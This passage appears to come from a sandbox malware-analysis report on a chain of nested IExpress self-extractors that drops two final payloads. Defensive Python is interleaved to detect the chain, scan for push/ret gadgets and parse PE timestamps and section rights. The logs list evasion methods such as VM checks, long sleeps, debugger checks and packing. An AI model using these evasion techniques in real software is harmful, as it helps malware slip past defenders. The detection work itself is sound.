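# wextract unpacks each stage into %TEMP%\IXPnnn.TMP and later removes the folder
# via rundll32 advpack.dll,DelNodeRunDLL32.
IXP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\IXP(\d{3})\.TMP\\", re.IGNORECASE)
DELNODE_RE = re.compile(r"advpack\.dll,\s*DelNodeRunDLL32\b", re.IGNORECASE)
RUNDLL32_RE = re.compile(r"(^|\\)rundll32\.exe$", re.IGNORECASE)


def ixp_index(path: str):
    """Return the nnn of an IXPnnn.TMP path component, or None if the path has none."""
    m = IXP_DIR_RE.search(path or "")
    return int(m.group(1)) if m else None


def analyze(events: List[Dict[str, str]], min_depth: int = 2) -> List[dict]:
    """events: process-creation records in chronological order (parents before children).
    Depth of an IXP-resident image = depth of its parent (0 if the parent is not an IXP
    stage) + 1. Findings are emitted for depth >= min_depth and for IXP cleanups."""
    depth: Dict[str, int] = {}
    findings = []
    for ev in events:
        image = ev["Image"]
        parent = ev.get("ParentImage", "")
        cmd = ev.get("CommandLine", "")
        idx = ixp_index(image)
        if idx is not None:
            depth[image] = depth.get(parent, 0) + 1
            if depth[image] >= min_depth:
                findings.append({"kind": "nested_wextract", "image": image, "parent": parent,
                                 "depth": depth[image], "stage_dir": idx})
        if RUNDLL32_RE.search(image) and DELNODE_RE.search(cmd):
            target = IXP_DIR_RE.search(cmd)
            findings.append({"kind": "ixp_cleanup", "image": image,
                             "stage_dir": int(target.group(1)) if target else None,
                             "command": cmd})
    return findings


TEMP = r"C:\Users\user\AppData\Local\Temp"
CLEANUP = r'"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "%s\IXP%03d.TMP\"'

# Constructed records. The chain mirrors the report's tree; parents the report shows
# as unknown are left empty. Two benign records follow: a single IExpress package run
# from Downloads (depth 1) and an unrelated rundll32 invocation.
SAMPLE_EVENTS = [
    {"ParentImage": "", "Image": r"C:\Users\user\Desktop\file.exe"},
    {"ParentImage": r"C:\Users\user\Desktop\file.exe", "Image": TEMP + r"\IXP000.TMP\pluT14Nj54.exe"},
    {"ParentImage": TEMP + r"\IXP000.TMP\pluT14Nj54.exe", "Image": TEMP + r"\IXP001.TMP\plct23La85.exe"},
    {"ParentImage": TEMP + r"\IXP001.TMP\plct23La85.exe", "Image": TEMP + r"\IXP002.TMP\plvy67MJ29.exe"},
    {"ParentImage": TEMP + r"\IXP002.TMP\plvy67MJ29.exe", "Image": TEMP + r"\IXP003.TMP\buze36rj14.exe"},
    {"ParentImage": TEMP + r"\IXP002.TMP\plvy67MJ29.exe", "Image": TEMP + r"\IXP003.TMP\caQi43qE17.exe"},
] + [
    {"ParentImage": "", "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": CLEANUP % (TEMP, n)}
    for n in range(4)
] + [
    {"ParentImage": r"C:\Users\user\Downloads\vendor-setup.exe", "Image": TEMP + r"\IXP000.TMP\setup.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

                    With the default threshold the chain yields four nested-stage findings (depths 2, 3, 4 and 4, the last two being the IXP003 siblings buze36rj14.exe and caQi43qE17.exe) and four cleanup findings, while the single-stage vendor package produces nothing; lowering min_depth to 1 turns every IXP-resident process into a hit, which is too noisy wherever IExpress installers are in legitimate use.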
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00171F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00391F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00131F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                    Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\file.exe | Command line argument: Kernel32.dll 0_2_00172BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Command line argument: Kernel32.dll 1_2_00392BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Command line argument: Kernel32.dll 2_2_00132BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Command line argument: Kernel32.dll 3_2_00FD2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Command line argument: 08A 10_2_00413780
                    Source: C:\Users\user\Desktop\file.exe | Automated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Automated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Automated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb | source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: wextract.pdbGCTL | source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb | source: plvy67MJ29.exe, 00000003.00000003.259906180.0000000004FA4000.00000004.00000020.00020000.00000000.sdmp, buze36rj14.exe, 00000004.00000000.260096763.0000000000902000.00000002.00000001.01000000.00000007.sdmp, buze36rj14.exe.3.dr
                    Source: Binary string: _.pdb | source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Unpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Unpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017724D push ecx; ret | 0_2_00177260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_0039724D push ecx; ret | 1_2_00397260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_0013724D push ecx; ret | 2_2_00137260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD724D push ecx; ret | 3_2_00FD7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0041C40C push cs; iretd | 10_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00423149 push eax; ret | 10_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0041C50E push cs; iretd | 10_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004231C8 push eax; ret | 10_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040E21D push ecx; ret | 10_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0041C6BE push ebx; ret | 10_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_008D8ACD push FFFFFFE1h; ret | 10_2_008D8ADC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_008DBA18 push edi; retf | 10_2_008DBA19
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0246573F push cs; retf | 10_2_02465740
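The push/ret, push/retf and push cs/iretd pairs listed above are flagged because a push immediately followed by a return transfers control to whatever was pushed: an indirect jump that a linear disassembler does not follow. The scanner below is an added example, not code from the report or from the sample; it locates those byte pairs in raw 32-bit x86 code using the opcode encodings from the Intel manual (50-57 push r32, 6A ib push imm8, 0E push cs, C3 ret, CB retf, CF iretd). The input bytes are constructed here (an MSVC-style prologue followed by each gadget shape the report lists) and are not bytes taken from the sample; `find_push_ret` and `decode_push` are names chosen for this example.

```python
# Opcode encodings (Intel SDM, 32-bit mode): 50-57 push r32, 6A ib push imm8,
# 0E push cs, C3 ret, CB retf, CF iretd.
REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def decode_push(code, i):
    """Return (mnemonic, length) if a push instruction starts at code[i], else (None, 0)."""
    op = code[i]
    if 0x50 <= op <= 0x57:
        return f"push {REGS[op - 0x50]}", 1
    if op == 0x0E:
        return "push cs", 1
    if op == 0x6A and i + 1 < len(code):
        # imm8 is sign-extended to 32 bits, which is why the report shows FFFFFFE1h for E1.
        imm = code[i + 1] - 0x100 if code[i + 1] >= 0x80 else code[i + 1]
        return f"push {imm & 0xFFFFFFFF:08X}h", 2
    return None, 0


def find_push_ret(code, base=0):
    """Linear scan for push-then-return pairs; returns [(address, 'push ...; ret'), ...].

    No disassembly is done, so a byte inside an operand or immediate can also match;
    the result is a list of candidates to confirm in a disassembler, not a verdict."""
    hits = []
    i = 0
    while i < len(code):
        mnemonic, length = decode_push(code, i)
        nxt = i + length
        if mnemonic and nxt < len(code) and code[nxt] in RETURNS:
            hits.append((base + i, f"{mnemonic}; {RETURNS[code[nxt]]}"))
            i = nxt + 1
        else:
            i += 1
    return hits


# Constructed input (not bytes from the sample): mov edi,edi / push ebp / mov ebp,esp,
# then push ecx;ret, nop, push -1Fh;ret, push cs;iretd, push edi;retf, push cs;retf.
SAMPLE_CODE = bytes.fromhex("8BFF 558BEC 51C3 90 6AE1C3 0ECF 57CB 0ECB")

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE_CODE, base=0x401000):
        print(f"{addr:08X}  {text}")
```

Treat a hit as a weak signal on its own: the report flags the identical `push ecx; ret` in file.exe and its three nested extractors (0_2_0017724D and counterparts), binaries whose wextract.pdb debug string identifies them as the Microsoft cabinet self-extractor stub, so the pattern also occurs in ordinary compiler output. The caQi43qE17.exe hits at 008Dxxxx and 0246xxxx, addresses outside the image's own .text, are the more interesting ones.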
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA | 0_2_00172F1D
                    Source: grWB27Fb84.exe.0.dr | Static PE information: 0x8398F8D0 [Sun Dec 18 17:01:04 2039 UTC]
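Two of the static findings in this section can be reproduced directly from the raw bytes of a PE: the link timestamp in IMAGE_FILE_HEADER (0x8398F8D0 decodes to 18 Dec 2039 17:01:04 UTC, later than any date at which the file could have been built, so the field was set by hand or by a packer), and the per-section memory rights that the "changes PE section rights" signature derives by comparing the section table of the unpacked dump with that of the original file (the unpack line above shows one layout with .rdata and one without). The parser below is an added example, not code from the report or from Joe Sandbox. Its input is a constructed, non-runnable PE skeleton built by `build_pe` (a hypothetical helper for this example): DOS header, PE signature, COFF header and section table, with SizeOfOptionalHeader set to 0 so that the section table follows the COFF header directly; real files declare a 224- or 240-byte optional header, and the parsers skip whatever size the header declares. The two section layouts are the ones printed in the unpack line above.

```python
import struct
from datetime import datetime, timezone

# IMAGE_SECTION_HEADER.Characteristics bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_header_offset(buf):
    """Offset of the 'PE\\0\\0' signature, after checking the DOS and PE magic."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return e_lfanew


def compile_timestamp(buf):
    """IMAGE_FILE_HEADER.TimeDateStamp (seconds since the Unix epoch) as an aware UTC datetime."""
    pe = pe_header_offset(buf)
    ts = struct.unpack_from("<I", buf, pe + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_suspicious(buf, reference):
    """A link time later than the reference time (e.g. the analysis date) cannot be genuine."""
    return compile_timestamp(buf) > reference


def section_rights(buf):
    """Map each section name to its memory rights in the report's E/R/W notation."""
    pe = pe_header_offset(buf)
    nsections = struct.unpack_from("<H", buf, pe + 6)[0]
    opt_size = struct.unpack_from("<H", buf, pe + 20)[0]
    table = pe + 24 + opt_size          # section headers follow the optional header
    rights = {}
    for i in range(nsections):
        off = table + 40 * i            # IMAGE_SECTION_HEADER is 40 bytes
        name = buf[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        chars = struct.unpack_from("<I", buf, off + 36)[0]
        flags = ""
        if chars & IMAGE_SCN_MEM_EXECUTE:
            flags += "E"
        if chars & IMAGE_SCN_MEM_READ:
            flags += "R"
        if chars & IMAGE_SCN_MEM_WRITE:
            flags += "W"
        rights[name] = flags
    return rights


def section_rights_changed(on_disk, in_memory):
    """Sections whose rights differ, or that exist on only one side, between file and dump."""
    a, b = section_rights(on_disk), section_rights(in_memory)
    return {n: (a.get(n), b.get(n)) for n in sorted(set(a) | set(b)) if a.get(n) != b.get(n)}


def build_pe(timestamp, sections):
    """Constructed test input (hypothetical helper): a minimal, non-runnable PE skeleton.
    DOS header, 'PE\\0\\0', COFF header with SizeOfOptionalHeader = 0, then the section table."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 0, 0x0102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, 0, 0, 0, 0, 0, 0, 0, 0, chars)
                     for name, chars in sections)
    return bytes(dos) + b"PE\x00\x00" + coff + table


# Section layouts from the unpack line in the report; the timestamp is the one flagged above.
ON_DISK = build_pe(0x8398F8D0, [(b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                                (b".rdata", IMAGE_SCN_MEM_READ),
                                (b".data", IMAGE_SCN_MEM_WRITE),
                                (b".rsrc", IMAGE_SCN_MEM_READ)])
IN_MEMORY = build_pe(0x8398F8D0, [(b".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                                  (b".data", IMAGE_SCN_MEM_WRITE),
                                  (b".rsrc", IMAGE_SCN_MEM_READ)])

if __name__ == "__main__":
    print("link time:", compile_timestamp(ON_DISK).isoformat(),
          "in the future:", timestamp_is_suspicious(ON_DISK, datetime.now(timezone.utc)))
    print("section rights changed:", section_rights_changed(ON_DISK, IN_MEMORY))
```

On a real file, pass the bytes of the sample as `on_disk` and the bytes of the sandbox's memory dump (the `.unpack` artifact) as `in_memory`; any section that gains W or E, or appears only on one side, is the same evidence the "Detected unpacking" signatures rest on. A future timestamp is an indicator, not proof: a timestamp of zero or one in the past is just as easy to forge, and the other three extractor stages in this chain inherit a plausible timestamp from wextract.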
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00171AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA | 0_2_00171AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00391AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA | 1_2_00391AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00131AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA | 2_2_00131AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA | 3_2_00FD1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Process information set: NOOPENFILEERRORBOX (14 identical events)
                    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (3 identical events)
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Process information set: NOOPENFILEERRORBOX (65 identical events)
                    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (9 identical events)

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe TID: 5060 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 996 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 4124 | Thread sleep count: 1520 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 2464 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 10_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Thread delayed: delay time: 922337203685477 (2 identical events)
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Window / User API: threadDelayed 1520
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\Desktop\file.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe
                    Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Thread delayed: delay time: 922337203685477 (2 identical events)
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | API call chain: ExitProcess graph end node
                    Source: caQi43qE17.exe, 0000000A.00000002.363644726.000000000092C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00175467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA | 0_2_00175467
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 0_2_00172390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00392390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 1_2_00392390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00132390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 2_2_00132390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 3_2_00FD2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear | 10_2_004019F0
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA | 0_2_00172F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_008D6FBB push dword ptr fs:[00000030h] | 10_2_008D6FBB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 10_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040ADB0 GetProcessHeap,HeapFree | 10_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Process token adjusted: Debug
